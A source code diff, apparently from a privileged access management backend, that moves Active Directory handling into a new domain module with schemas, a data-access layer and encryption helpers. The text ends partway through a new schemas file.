b/backend/src/ee/services/pam-discovery/active-directory/active-directory-discovery-factory.ts @@ -20,9 +20,11 @@ import { TPamAccountDALFactory } from "../../pam-account/pam-account-dal"; import { encryptAccountCredentials 
} from "../../pam-account/pam-account-fns"; import { TActiveDirectoryAccountCredentials, - TActiveDirectoryAccountInternalMetadata, - TActiveDirectoryResourceConnectionDetails -} from "../../pam-resource/active-directory/active-directory-resource-types"; + TActiveDirectoryAccountInternalMetadata +} from "../../pam-domain/active-directory/active-directory-domain-types"; +import { TPamDomainDALFactory } from "../../pam-domain/pam-domain-dal"; +import { PamDomainType } from "../../pam-domain/pam-domain-enums"; +import { encryptDomainConnectionDetails } from "../../pam-domain/pam-domain-fns"; import { TPamResourceDALFactory } from "../../pam-resource/pam-resource-dal"; import { PamResource } from "../../pam-resource/pam-resource-enums"; import { encryptResourceConnectionDetails, encryptResourceInternalMetadata } from "../../pam-resource/pam-resource-fns"; @@ -453,32 +455,32 @@ const executeLdapEnumeration = async ( ); }; -const upsertAdServerResource = async ( +const upsertDomain = async ( projectId: string, configuration: TAdDiscoveryConfiguration, gatewayId: string, kmsService: Pick, - pamResourceDAL: Pick, + pamDomainDAL: Pick, tx: Knex ) => { const fingerprint = configuration.domainFQDN.toLowerCase(); - const existing = await pamResourceDAL.find( + const existing = await pamDomainDAL.find( { projectId, - resourceType: PamResource.ActiveDirectory, + domainType: PamDomainType.ActiveDirectory, discoveryFingerprint: fingerprint }, { tx } ); if (existing.length > 0) { - return { resource: existing[0], isNew: false }; + return { domain: existing[0], isNew: false }; } const domainResourceName = toSlugName(configuration.domainFQDN); - const encryptedConnectionDetails = await encryptResourceConnectionDetails({ + const encryptedConnectionDetails = await encryptDomainConnectionDetails({ projectId, connectionDetails: { domain: configuration.domainFQDN, @@ -488,15 +490,15 @@ const upsertAdServerResource = async ( ldapRejectUnauthorized: configuration.ldapRejectUnauthorized, 
ldapCaCert: configuration.ldapCaCert, ldapTlsServerName: configuration.ldapTlsServerName - } as TActiveDirectoryResourceConnectionDetails, + }, kmsService }); - const resource = await pamResourceDAL.create( + const domain = await pamDomainDAL.create( { projectId, name: domainResourceName, - resourceType: PamResource.ActiveDirectory, + domainType: PamDomainType.ActiveDirectory, gatewayId, encryptedConnectionDetails, discoveryFingerprint: fingerprint @@ -504,13 +506,14 @@ const upsertAdServerResource = async ( tx ); - return { resource, isNew: true }; + return { domain, isNew: true }; }; const upsertWindowsServerResource = async ( projectId: string, computer: TLdapComputer, - adServerResourceId: string, + domainId: string, + domainFQDN: string, gatewayId: string, winrmConfig: { winrmPort: number; @@ -519,23 +522,29 @@ const upsertWindowsServerResource = async ( winrmCaCert?: string; }, kmsService: Pick, - pamResourceDAL: Pick, + pamResourceDAL: Pick, tx: Knex ) => { - const fingerprint = computer.objectGUID; + const fingerprint = `${domainFQDN.toLowerCase()}:${computer.objectGUID}`; const existing = await pamResourceDAL.find( { projectId, resourceType: PamResource.Windows, - discoveryFingerprint: fingerprint, - adServerResourceId + discoveryFingerprint: fingerprint }, { tx } ); if (existing.length > 0) { - return { resource: existing[0], isNew: false }; + const found = existing[0]; + + // Reconnect if the resource was orphaned (e.g. 
the domain was previously deleted) + if (!found.domainId) { + const reconnected = await pamResourceDAL.updateById(found.id, { domainId }, tx); + return { resource: reconnected, isNew: false }; + } + return { resource: found, isNew: false }; } const hostname = computer.dNSHostName || computer.cn; @@ -570,7 +579,7 @@ const upsertWindowsServerResource = async ( gatewayId, encryptedConnectionDetails, encryptedResourceMetadata, - adServerResourceId, + domainId, discoveryFingerprint: fingerprint }, tx @@ -582,16 +591,18 @@ const upsertWindowsServerResource = async ( const upsertDomainAccount = async ( projectId: string, user: TLdapUser, - adServerResourceId: string, + domainId: string, + domainFQDN: string, kmsService: Pick, pamAccountDAL: Pick, tx: Knex ) => { - const fingerprint = user.objectGUID; + const fingerprint = `${domainFQDN.toLowerCase()}:${user.objectGUID}`; const existing = await pamAccountDAL.find( { - resourceId: adServerResourceId, + projectId, + domainId, discoveryFingerprint: fingerprint }, { tx } @@ -634,7 +645,7 @@ const upsertDomainAccount = async ( const account = await pamAccountDAL.create( { projectId, - resourceId: adServerResourceId, + domainId, name: accountName, encryptedCredentials, internalMetadata, @@ -781,12 +792,13 @@ const upsertLocalAccount = async ( projectId: string, localUser: TWinRmLocalUser, computerObjectGUID: string, + domainFQDN: string, windowsServerResourceId: string, kmsService: Pick, pamAccountDAL: Pick, tx: Knex ) => { - const fingerprint = `${computerObjectGUID}:${localUser.Name.toLowerCase()}`; + const fingerprint = `${domainFQDN.toLowerCase()}:${computerObjectGUID}:${localUser.Name.toLowerCase()}`; const existing = await pamAccountDAL.find( { @@ -932,6 +944,7 @@ export const activeDirectoryDiscoveryFactory: TPamDiscoveryFactory< pamDiscoverySourceAccountsDAL, pamDiscoverySourceDependenciesDAL, pamAccountDependenciesDAL, + pamDomainDAL, pamResourceDAL, pamAccountDAL, kmsService @@ -985,30 +998,11 @@ export const 
activeDirectoryDiscoveryFactory: TPamDiscoveryFactory< } as TActiveDirectoryDiscoverySourceRunProgress }); - // Auto-import AD Server resource - const { resource: adServerResource, isNew: isAdServerNew } = await pamResourceDAL.transaction(async (tx) => { - const result = await upsertAdServerResource( - projectId, - configuration, - gatewayId, - kmsService, - pamResourceDAL, - tx - ); - - await pamDiscoverySourceResourcesDAL.upsertJunction( - { - discoverySourceId, - resourceId: result.resource.id, - lastDiscoveredRunId: run.id - }, - tx - ); - + // Auto-import AD domain + const { domain } = await pamDomainDAL.transaction(async (tx) => { + const result = await upsertDomain(projectId, configuration, gatewayId, kmsService, pamDomainDAL, tx); return result; }); - resourcesDiscoveredCount += 1; - if (isAdServerNew) newResourcesCount += 1; // Auto-import Windows Server resources and build mapping for local account discovery const computerResourceMap = new Map(); // objectGUID -> resourceId @@ -1019,7 +1013,8 @@ export const activeDirectoryDiscoveryFactory: TPamDiscoveryFactory< const result = await upsertWindowsServerResource( projectId, computer, - adServerResource.id, + domain.id, + configuration.domainFQDN, gatewayId, { winrmPort: configuration.winrmPort, @@ -1066,7 +1061,8 @@ export const activeDirectoryDiscoveryFactory: TPamDiscoveryFactory< const result = await upsertDomainAccount( projectId, user, - adServerResource.id, + domain.id, + configuration.domainFQDN, kmsService, pamAccountDAL, tx @@ -1129,6 +1125,7 @@ export const activeDirectoryDiscoveryFactory: TPamDiscoveryFactory< projectId, localUser, computer.objectGUID, + configuration.domainFQDN, windowsResourceId, kmsService, pamAccountDAL, diff --git a/backend/src/ee/services/pam-discovery/pam-discovery-factory.ts b/backend/src/ee/services/pam-discovery/pam-discovery-factory.ts index 4c6a12110e2..1c39e3136e6 100644 --- a/backend/src/ee/services/pam-discovery/pam-discovery-factory.ts +++ 
b/backend/src/ee/services/pam-discovery/pam-discovery-factory.ts @@ -14,6 +14,7 @@ import { TPamDiscoveryCredentials, TPamDiscoveryFactory } from "@app/ee/services/pam-discovery/pam-discovery-types"; +import { TPamDomainDALFactory } from "@app/ee/services/pam-domain/pam-domain-dal"; import { TPamResourceDALFactory } from "@app/ee/services/pam-resource/pam-resource-dal"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; @@ -27,6 +28,7 @@ export type TPamDiscoveryScanDeps = { "upsertJunction" | "markStaleForRun" >; pamAccountDependenciesDAL: Pick; + pamDomainDAL: Pick; pamResourceDAL: Pick; pamAccountDAL: Pick; kmsService: Pick; diff --git a/backend/src/ee/services/pam-discovery/pam-discovery-queue.ts b/backend/src/ee/services/pam-discovery/pam-discovery-queue.ts index ae4cc4d87da..fe6979c2d68 100644 --- a/backend/src/ee/services/pam-discovery/pam-discovery-queue.ts +++ b/backend/src/ee/services/pam-discovery/pam-discovery-queue.ts @@ -5,6 +5,7 @@ import { JOB_SCHEDULER_PREFIX, QueueJobs, QueueName, TQueueServiceFactory } from import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { TPamAccountDALFactory } from "../pam-account/pam-account-dal"; +import { TPamDomainDALFactory } from "../pam-domain/pam-domain-dal"; import { TPamResourceDALFactory } from "../pam-resource/pam-resource-dal"; import { TPamAccountDependenciesDALFactory } from "./pam-account-dependencies-dal"; import { PamDiscoverySourceRunTrigger, PamDiscoveryType } from "./pam-discovery-enums"; @@ -27,6 +28,7 @@ type TPamDiscoveryQueueFactoryDep = { "upsertJunction" | "markStaleForRun" >; pamAccountDependenciesDAL: Pick; + pamDomainDAL: Pick; pamResourceDAL: Pick; pamAccountDAL: Pick; kmsService: Pick; @@ -44,6 +46,7 @@ export const pamDiscoveryQueueFactory = ({ pamDiscoverySourceAccountsDAL, pamDiscoverySourceDependenciesDAL, pamAccountDependenciesDAL, + pamDomainDAL, pamResourceDAL, pamAccountDAL, kmsService, @@ -92,6 +95,7 @@ export const pamDiscoveryQueueFactory = 
({ pamDiscoverySourceAccountsDAL, pamDiscoverySourceDependenciesDAL, pamAccountDependenciesDAL, + pamDomainDAL, pamResourceDAL, pamAccountDAL, kmsService, diff --git a/backend/src/ee/services/pam-discovery/pam-discovery-schemas.ts b/backend/src/ee/services/pam-discovery/pam-discovery-schemas.ts index 1d5ddbb862b..541b6609a3d 100644 --- a/backend/src/ee/services/pam-discovery/pam-discovery-schemas.ts +++ b/backend/src/ee/services/pam-discovery/pam-discovery-schemas.ts @@ -8,12 +8,13 @@ import { } from "@app/db/schemas"; import { slugSchema } from "@app/server/lib/schemas"; -import { ActiveDirectoryAccountMetadataSchema } from "../pam-resource/active-directory/active-directory-resource-schemas"; +import { ActiveDirectoryAccountMetadataSchema } from "../pam-domain/active-directory/active-directory-domain-schemas"; +import { PamDomainType } from "../pam-domain/pam-domain-enums"; import { PamResource } from "../pam-resource/pam-resource-enums"; -import { SSHResourceInternalMetadataSchema } from "../pam-resource/ssh/ssh-resource-schemas"; +import { SanitizedSSHResourceInternalMetadataSchema } from "../pam-resource/ssh/ssh-resource-schemas"; import { - WindowsAccountMetadataSchema, - WindowsResourceInternalMetadataSchema + SanitizedWindowsResourceInternalMetadataSchema, + WindowsAccountMetadataSchema } from "../pam-resource/windows-server/windows-server-resource-schemas"; import { PamDiscoverySchedule, @@ -57,15 +58,18 @@ export const DiscoveredResourceSchema = PamDiscoverySourceResourcesSchema.extend resourceName: z.string(), resourceType: z.nativeEnum(PamResource), resourceInternalMetadata: z - .union([SSHResourceInternalMetadataSchema, WindowsResourceInternalMetadataSchema]) + .union([SanitizedSSHResourceInternalMetadataSchema, SanitizedWindowsResourceInternalMetadataSchema]) .optional(), dependencyCount: z.number().default(0) }); export const DiscoveredAccountSchema = PamDiscoverySourceAccountsSchema.extend({ - resourceType: z.nativeEnum(PamResource), - resourceName: 
z.string(), - resourceId: z.string().uuid(), + resourceType: z.nativeEnum(PamResource).nullable().optional(), + resourceName: z.string().nullable().optional(), + resourceId: z.string().uuid().nullable().optional(), + domainType: z.nativeEnum(PamDomainType).nullable().optional(), + domainName: z.string().nullable().optional(), + domainId: z.string().uuid().nullable().optional(), accountName: z.string(), internalMetadata: z.union([ActiveDirectoryAccountMetadataSchema, WindowsAccountMetadataSchema]), dependencyCount: z.number().default(0) diff --git a/backend/src/ee/services/pam-discovery/pam-discovery-source-accounts-dal.ts b/backend/src/ee/services/pam-discovery/pam-discovery-source-accounts-dal.ts index f0c9e508cae..8160e25833d 100644 --- a/backend/src/ee/services/pam-discovery/pam-discovery-source-accounts-dal.ts +++ b/backend/src/ee/services/pam-discovery/pam-discovery-source-accounts-dal.ts @@ -21,7 +21,8 @@ export const pamDiscoverySourceAccountsDALFactory = (db: TDbClient) => { const dbInstance = tx || db.replicaNode(); const query = dbInstance(TableName.PamDiscoverySourceAccount) .join(TableName.PamAccount, `${TableName.PamDiscoverySourceAccount}.accountId`, `${TableName.PamAccount}.id`) - .join(TableName.PamResource, `${TableName.PamAccount}.resourceId`, `${TableName.PamResource}.id`) + .leftJoin(TableName.PamResource, `${TableName.PamAccount}.resourceId`, `${TableName.PamResource}.id`) + .leftJoin(TableName.PamDomain, `${TableName.PamAccount}.domainId`, `${TableName.PamDomain}.id`) .where(`${TableName.PamDiscoverySourceAccount}.discoverySourceId`, discoverySourceId); const countQuery = query.clone().count("*", { as: "count" }).first(); @@ -30,9 +31,12 @@ export const pamDiscoverySourceAccountsDALFactory = (db: TDbClient) => { selectAllTableCols(TableName.PamDiscoverySourceAccount), db.ref("name").withSchema(TableName.PamAccount).as("accountName"), db.ref("resourceId").withSchema(TableName.PamAccount).as("resourceId"), + 
db.ref("domainId").withSchema(TableName.PamAccount).as("domainId"), db.ref("resourceType").withSchema(TableName.PamResource).as("resourceType"), + db.ref("domainType").withSchema(TableName.PamDomain).as("domainType"), db.ref("internalMetadata").withSchema(TableName.PamAccount).as("internalMetadata"), - db.ref("name").withSchema(TableName.PamResource).as("resourceName") + db.ref("name").withSchema(TableName.PamResource).as("resourceName"), + db.ref("name").withSchema(TableName.PamDomain).as("domainName") ); void query.orderBy(`${TableName.PamAccount}.name`, "asc"); diff --git a/backend/src/ee/services/pam-discovery/pam-discovery-source-service.ts b/backend/src/ee/services/pam-discovery/pam-discovery-source-service.ts index f79b1970700..fae4bc71e1d 100644 --- a/backend/src/ee/services/pam-discovery/pam-discovery-source-service.ts +++ b/backend/src/ee/services/pam-discovery/pam-discovery-source-service.ts @@ -76,7 +76,7 @@ type TPamDiscoverySourceServiceFactoryDep = { | "updateById" | "deleteById" >; - pamAccountDAL: Pick; + pamAccountDAL: Pick; pamResourceDAL: Pick; permissionService: Pick; kmsService: Pick; @@ -632,32 +632,38 @@ export const pamDiscoverySourceServiceFactory = ({ actorAuthMethod: ActorAuthMethod, actorOrgId: string ) => { - const accountWithResource = await pamAccountDAL.findByIdWithResourceDetails(accountId); - if (!accountWithResource) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + const accountWithParent = await pamAccountDAL.findByIdWithParentDetails(accountId); + if (!accountWithParent) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); const { permission } = await permissionService.getProjectPermission({ actor, actorId, - projectId: accountWithResource.projectId, + projectId: accountWithParent.projectId, actorAuthMethod, actorOrgId, actionProjectType: ActionProjectType.PAM }); - const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithResource.id]); 
- const accountMetadata = metadataByAccountId[accountWithResource.id] || []; + const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithParent.id]); + const accountMetadata = metadataByAccountId[accountWithParent.id] || []; ForbiddenError.from(permission).throwUnlessCan( action, subject(ProjectPermissionSub.PamAccounts, { - resourceName: accountWithResource.resource.name, - accountName: accountWithResource.name, - resourceType: accountWithResource.resource.resourceType, + accountName: accountWithParent.name, + ...(accountWithParent.resource && { + resourceName: accountWithParent.resource.name, + resourceType: accountWithParent.resource.resourceType + }), + ...(accountWithParent.domain && { + domainName: accountWithParent.domain.name, + domainType: accountWithParent.domain.domainType + }), metadata: accountMetadata }) ); - return accountWithResource; + return accountWithParent; }; const decryptDependencySyncMessages = async ( @@ -697,7 +703,7 @@ export const pamDiscoverySourceServiceFactory = ({ actorAuthMethod: ActorAuthMethod; actorOrgId: string; }) => { - const accountWithResource = await verifyAccountPermission( + const accountWithParent = await verifyAccountPermission( accountId, ProjectPermissionPamAccountActions.Read, actor, @@ -706,7 +712,7 @@ export const pamDiscoverySourceServiceFactory = ({ actorOrgId ); const deps = await pamAccountDependenciesDAL.findByAccountId(accountId); - return decryptDependencySyncMessages(deps, accountWithResource.projectId); + return decryptDependencySyncMessages(deps, accountWithParent.projectId); }; const getResourceDependencies = async ({ diff --git a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-enums.ts b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-enums.ts similarity index 100% rename from backend/src/ee/services/pam-resource/active-directory/active-directory-resource-enums.ts rename to 
backend/src/ee/services/pam-domain/active-directory/active-directory-domain-enums.ts diff --git a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-factory.ts b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-factory.ts similarity index 90% rename from backend/src/ee/services/pam-resource/active-directory/active-directory-resource-factory.ts rename to backend/src/ee/services/pam-domain/active-directory/active-directory-domain-factory.ts index d852809a8f7..2f3f8caff65 100644 --- a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-factory.ts +++ b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-factory.ts @@ -7,27 +7,23 @@ import { logger } from "@app/lib/logger"; import { verifyHostInputValidity } from "../../dynamic-secret/dynamic-secret-fns"; import { TGatewayV2ServiceFactory } from "../../gateway-v2/gateway-v2-service"; -import { generatePassword } from "../../secret-rotation-v2/shared/utils"; -import { PamResource } from "../pam-resource-enums"; +import { PamResource } from "../../pam-resource/pam-resource-enums"; import { - TPamResourceFactory, TPamResourceFactoryRotateAccountCredentials, TPamResourceFactoryValidateAccountCredentials, - TPamResourceInternalMetadata, TPostRotateContext -} from "../pam-resource-types"; -import { syncDependenciesAfterRotation } from "../shared/dependency-sync-fns"; -import { resolveDnsTcp } from "../shared/dns-over-dc"; -import { - TActiveDirectoryAccountCredentials, - TActiveDirectoryResourceConnectionDetails -} from "./active-directory-resource-types"; +} from "../../pam-resource/pam-resource-types"; +import { syncDependenciesAfterRotation } from "../../pam-resource/shared/dependency-sync-fns"; +import { resolveDnsTcp } from "../../pam-resource/shared/dns-over-dc"; +import { generatePassword } from "../../secret-rotation-v2/shared/utils"; +import { TPamDomainFactory } from "../pam-domain-types"; +import { 
TActiveDirectoryAccountCredentials, TActiveDirectoryConnectionDetails } from "./active-directory-domain-types"; const EXTERNAL_REQUEST_TIMEOUT = 10 * 1000; const executeWithGateway = async ( config: { - connectionDetails: TActiveDirectoryResourceConnectionDetails; + connectionDetails: TActiveDirectoryConnectionDetails; resourceType: PamResource; gatewayId: string; targetPortOverride?: number; @@ -64,11 +60,11 @@ const executeWithGateway = async ( ); }; -export const activeDirectoryResourceFactory: TPamResourceFactory< - TActiveDirectoryResourceConnectionDetails, - TActiveDirectoryAccountCredentials, - TPamResourceInternalMetadata -> = (resourceType, connectionDetails, gatewayId, gatewayV2Service) => { +export const activeDirectoryDomainFactory: TPamDomainFactory< + TActiveDirectoryConnectionDetails, + TActiveDirectoryAccountCredentials +> = (domainType, connectionDetails, gatewayId, gatewayV2Service) => { + const resourceType = domainType as unknown as PamResource; const ldapProtocol = connectionDetails.useLdaps ? "ldaps" : "ldap"; const buildLdapTlsOptions = () => { @@ -113,15 +109,18 @@ export const activeDirectoryResourceFactory: TPamResourceFactory< if (clientError) return; if (err) { - // Even if anonymous bind is rejected, an LDAP error response means the server is an LDAP server - // Only reject if it's a connection-level error (not an LDAP protocol error) + // Connection-level errors mean the server is unreachable + // Any other LDAP error (e.g. 
InvalidCredentialsError) means the server responded with a protocol-level rejection if (err.name === "ConnectionError" || err.name === "TimeoutError") { client.unbind(); reject(err); - } else { - logger.info("[Active Directory Resource Factory] LDAP connection validated (server responded)"); + } else if ("lde_message" in err) { + logger.info("[Active Directory Domain Factory] LDAP connection validated (server responded)"); client.unbind(); resolve(); + } else { + client.unbind(); + reject(err); } } else { logger.info("[Active Directory Resource Factory] LDAP anonymous bind successful"); @@ -238,7 +237,7 @@ export const activeDirectoryResourceFactory: TPamResourceFactory< // Search for target user's DN by sAMAccountName const searchBase = connectionDetails.domain .split(".") - .map((dc) => `DC=${dc}`) + .map((dc: string) => `DC=${dc}`) .join(","); client.search( diff --git a/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-schemas.ts b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-schemas.ts new file mode 100644 index 00000000000..14629f16cd6 --- /dev/null +++ b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-schemas.ts @@ -0,0 +1,72 @@ +import { z } from "zod"; + +import { + BaseCreatePamAccountSchema, + BasePamAccountSchema, + BasePamAccountSchemaWithResource, + BaseUpdatePamAccountSchema +} from "../../pam-resource/pam-resource-schemas"; +import { PamDomainType } from "../pam-domain-enums"; +import { ActiveDirectoryAccountType } from "./active-directory-domain-enums"; + +export const ActiveDirectoryConnectionDetailsSchema = z.object({ + domain: z.string().trim().min(1).max(255), + dcAddress: z.string().trim().min(1).max(255), + port: z.coerce.number().int().min(1).max(65535), + useLdaps: z.boolean(), + ldapRejectUnauthorized: z.boolean(), + ldapCaCert: z + .string() + .trim() + .transform((val) => val || undefined) + .optional(), + ldapTlsServerName: z + .string() + .trim() + 
.transform((val) => val || undefined) + .optional() +}); + +export const ActiveDirectoryAccountCredentialsSchema = z.object({ + username: z.string().trim().min(1).max(255), + password: z.string().trim().min(1).max(255) +}); + +export const ActiveDirectoryAccountMetadataSchema = z.object({ + accountType: z.nativeEnum(ActiveDirectoryAccountType), + adGuid: z.string().optional(), + displayName: z.string().optional(), + userPrincipalName: z.string().optional(), + servicePrincipalName: z.string().array().optional(), + userAccountControl: z.number().optional(), + passwordLastSet: z.string().optional(), + lastLogon: z.string().optional() +}); + +export const ActiveDirectoryAccountSchema = BasePamAccountSchema.extend({ + credentials: ActiveDirectoryAccountCredentialsSchema, + internalMetadata: ActiveDirectoryAccountMetadataSchema +}); + +export const CreateActiveDirectoryAccountSchema = BaseCreatePamAccountSchema.omit({ resourceId: true }).extend({ + domainId: z.string().uuid(), + credentials: ActiveDirectoryAccountCredentialsSchema, + internalMetadata: ActiveDirectoryAccountMetadataSchema +}); + +export const UpdateActiveDirectoryAccountSchema = BaseUpdatePamAccountSchema.extend({ + credentials: ActiveDirectoryAccountCredentialsSchema.optional(), + internalMetadata: ActiveDirectoryAccountMetadataSchema.optional() +}); + +export const SanitizedActiveDirectoryAccountWithDomainSchema = BasePamAccountSchemaWithResource.extend({ + parentType: z.literal(PamDomainType.ActiveDirectory), + credentials: z.object({ + username: z.string() + }), + internalMetadata: ActiveDirectoryAccountMetadataSchema +}); + +export const ActiveDirectorySessionCredentialsSchema = ActiveDirectoryConnectionDetailsSchema.and( + ActiveDirectoryAccountCredentialsSchema +); diff --git a/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-types.ts b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-types.ts new file mode 100644 index 00000000000..113bc4e95ab 
--- /dev/null +++ b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-types.ts @@ -0,0 +1,12 @@ +import { z } from "zod"; + +import { + ActiveDirectoryAccountCredentialsSchema, + ActiveDirectoryAccountMetadataSchema, + ActiveDirectoryConnectionDetailsSchema +} from "./active-directory-domain-schemas"; + +export type TActiveDirectoryConnectionDetails = z.infer; + +export type TActiveDirectoryAccountCredentials = z.infer; +export type TActiveDirectoryAccountInternalMetadata = z.infer; diff --git a/backend/src/ee/services/pam-domain/pam-domain-dal.ts b/backend/src/ee/services/pam-domain/pam-domain-dal.ts new file mode 100644 index 00000000000..c773cad1567 --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-dal.ts @@ -0,0 +1,119 @@ +import { Knex } from "knex"; +import RE2 from "re2"; + +import { TDbClient } from "@app/db"; +import { TableName } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { ormify, selectAllTableCols } from "@app/lib/knex"; +import { OrderByDirection } from "@app/lib/types"; + +import { PamDomainOrderBy } from "./pam-domain-enums"; + +export type TPamDomainDALFactory = ReturnType; + +export const pamDomainDALFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.PamDomain); + + const findById = async (id: string, tx?: Knex) => { + try { + const result = await (tx || db.replicaNode())(TableName.PamDomain) + .leftJoin(TableName.GatewayV2, `${TableName.PamDomain}.gatewayId`, `${TableName.GatewayV2}.id`) + .where(`${TableName.PamDomain}.id`, id) + .select(selectAllTableCols(TableName.PamDomain)) + .select( + db.ref("name").withSchema(TableName.GatewayV2).as("gatewayName"), + db.ref("identityId").withSchema(TableName.GatewayV2).as("gatewayIdentityId") + ) + .first(); + + return result || null; + } catch (error) { + throw new DatabaseError({ error, name: "Find PAM domain by ID" }); + } + }; + + const findByProjectId = async ( + { + projectId, + search, + limit, + offset 
= 0, + orderBy = PamDomainOrderBy.Name, + orderDirection = OrderByDirection.ASC, + filterDomainTypes, + discoveryFingerprint + }: { + projectId: string; + search?: string; + limit?: number; + offset?: number; + orderBy?: PamDomainOrderBy; + orderDirection?: OrderByDirection; + filterDomainTypes?: string[]; + discoveryFingerprint?: string; + }, + tx?: Knex + ) => { + try { + const dbInstance = tx || db.replicaNode(); + const query = dbInstance(TableName.PamDomain).where(`${TableName.PamDomain}.projectId`, projectId); + + if (search) { + const escapedSearch = search + .replace(new RE2(/\\/g), "\\\\") + .replace(new RE2(/%/g), "\\%") + .replace(new RE2(/_/g), "\\_"); + const pattern = `%${escapedSearch}%`; + void query.whereRaw(`??.?? ILIKE ? ESCAPE '\\'`, [TableName.PamDomain, "name", pattern]); + } + + if (filterDomainTypes && filterDomainTypes.length) { + void query.whereIn(`${TableName.PamDomain}.domainType`, filterDomainTypes); + } + + if (discoveryFingerprint) { + void query.where(`${TableName.PamDomain}.discoveryFingerprint`, discoveryFingerprint); + } + + const countQuery = query.clone().count("*", { as: "count" }).first(); + + void query.select(selectAllTableCols(TableName.PamDomain)); + + const direction = orderDirection === OrderByDirection.ASC ? "ASC" : "DESC"; + void query.orderByRaw(`${TableName.PamDomain}.?? 
COLLATE "en-x-icu" ${direction}`, [orderBy]); + + if (typeof limit === "number") { + void query.limit(limit).offset(offset); + } + + const [results, countResult] = await Promise.all([query, countQuery]); + const totalCount = Number(countResult?.count || 0); + + return { domains: results, totalCount }; + } catch (error) { + throw new DatabaseError({ error, name: "Find PAM domains by project" }); + } + }; + + const findMetadataByDomainIds = async (domainIds: string[], tx?: Knex) => { + if (!domainIds.length) return {}; + const rows = await (tx || db.replicaNode())(TableName.ResourceMetadata) + .select("id", "key", "value", "pamDomainId") + .whereIn("pamDomainId", domainIds); + const byDomainId: Record> = {}; + for (const row of rows) { + if (row.pamDomainId) { + if (!byDomainId[row.pamDomainId]) byDomainId[row.pamDomainId] = []; + byDomainId[row.pamDomainId].push({ id: row.id, key: row.key, value: row.value || "" }); + } + } + return byDomainId; + }; + + return { + ...orm, + findById, + findByProjectId, + findMetadataByDomainIds + }; +}; diff --git a/backend/src/ee/services/pam-domain/pam-domain-enums.ts b/backend/src/ee/services/pam-domain/pam-domain-enums.ts new file mode 100644 index 00000000000..03fcd18cad1 --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-enums.ts @@ -0,0 +1,7 @@ +export enum PamDomainType { + ActiveDirectory = "active-directory" +} + +export enum PamDomainOrderBy { + Name = "name" +} diff --git a/backend/src/ee/services/pam-domain/pam-domain-factory.ts b/backend/src/ee/services/pam-domain/pam-domain-factory.ts new file mode 100644 index 00000000000..1ab6a8a2e3e --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-factory.ts @@ -0,0 +1,10 @@ +import { TPamAccountCredentials } from "../pam-resource/pam-resource-types"; +import { activeDirectoryDomainFactory } from "./active-directory/active-directory-domain-factory"; +import { PamDomainType } from "./pam-domain-enums"; +import { TPamDomainConnectionDetails, 
TPamDomainFactory } from "./pam-domain-types"; + +type TPamDomainFactoryImplementation = TPamDomainFactory; + +export const PAM_DOMAIN_FACTORY_MAP: Record = { + [PamDomainType.ActiveDirectory]: activeDirectoryDomainFactory as TPamDomainFactoryImplementation +}; diff --git a/backend/src/ee/services/pam-domain/pam-domain-fns.ts b/backend/src/ee/services/pam-domain/pam-domain-fns.ts new file mode 100644 index 00000000000..bd2d4b40327 --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-fns.ts @@ -0,0 +1,46 @@ +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; +import { KmsDataKey } from "@app/services/kms/kms-types"; + +import { TPamDomainConnectionDetails } from "./pam-domain-types"; + +export const encryptDomainConnectionDetails = async ({ + projectId, + connectionDetails, + kmsService +}: { + projectId: string; + connectionDetails: TPamDomainConnectionDetails; + kmsService: Pick; +}) => { + const { encryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.SecretManager, + projectId + }); + + const { cipherTextBlob } = encryptor({ + plainText: Buffer.from(JSON.stringify(connectionDetails)) + }); + + return cipherTextBlob; +}; + +export const decryptDomainConnectionDetails = async ({ + projectId, + encryptedConnectionDetails, + kmsService +}: { + projectId: string; + encryptedConnectionDetails: Buffer; + kmsService: Pick; +}) => { + const { decryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.SecretManager, + projectId + }); + + const decryptedPlainTextBlob = decryptor({ + cipherTextBlob: encryptedConnectionDetails + }); + + return JSON.parse(decryptedPlainTextBlob.toString()) as TPamDomainConnectionDetails; +}; diff --git a/backend/src/ee/services/pam-domain/pam-domain-schemas.ts b/backend/src/ee/services/pam-domain/pam-domain-schemas.ts new file mode 100644 index 00000000000..40d9378337e --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-schemas.ts @@ -0,0 +1,55 @@ 
